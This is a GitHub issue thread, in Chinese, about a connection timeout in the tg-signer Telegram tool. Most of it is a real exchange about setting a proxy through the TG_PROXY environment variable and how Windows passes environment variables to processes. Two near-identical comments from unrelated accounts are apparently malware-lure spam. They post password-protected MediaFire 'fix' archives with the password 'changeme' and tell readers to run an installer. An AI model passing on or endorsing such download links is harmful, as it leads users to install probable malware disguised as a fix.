### ISSUE TITLE
运行文件后出现连接失败问题

### ISSUE THREAD

**Issue by tnt1223** [amchii/tg-signer#4]
终端运行tg-signer run指令，填写任务名以及对话后，出现以下报错：
[WARNING] [pyrogram.connection.connection] 2024-08-27 20:35:52,835 connection.py 50 Unable to connect due to network issues: Connection timed out

代理工具是CLASH，能正常登录telegram桌面版。

**Comment by amchii** [comment]
`tg-signer`不会默认使用系统代理，想设置代理需要通过环境变量`TG_PROXY`：
https://github.com/amchii/tg-signer?tab=readme-ov-file#configure-proxyif-necessary

**Comment by tnt1223** [comment]
> `tg-signer`不会默认使用系统代理，想设置代理需要通过环境变量`TG_PROXY`： https://github.com/amchii/tg-signer?tab=readme-ov-file#configure-proxyif-necessary

powershell设置一下可以了，但是系统环境变量不知道为什么读取不了，我用os.environ.get获取也是空值。
$env:TG_PROXY="http://127.0.0.1:7890"

**Comment by tnt1223** [comment]
> 看图你设置的是用户变量，另外设置完变量需要重新打开终端才会生效，如果你使用管理员权限打开的话，用户变量还是不会生效的。你也可以通过`系统变量`设置`TG_PROXY`，这样会对所有用户生效。

os.environ.get()方法对Path，TEMP，TMP等其他变量都是生效的，返回的值也对得上。另外我是在vscode的终端下运行的命令，应该和管理员权限无关？

**Comment by amchii** [comment]
和`os.environ.get`没关系，和Python解释器继承的环境变量有关，也即解释器的父进程。你可以了解下环境变量的相关知识。

**Comment by tnt1223** [comment]
> 和`os.environ.get`没关系，和Python解释器继承的环境变量有关，也即解释器的父进程。你可以了解下环境变量的相关知识。

我重启电脑了，`os.environ.get`能找到值了，我之前查到的是重启下终端或者vscode就行，想偷个懒，没想到还是得重启电脑。父进程指的是powershell或cmd吗？我在重启前在powershell运行echo $env:TG_PROXY，返回也是空值。

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amchii** [comment]
你在某个cmd进程下启动python，那该python进程的父进程就是cmd。Windows的环境变量比Linux复杂些，可以自行了解。

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
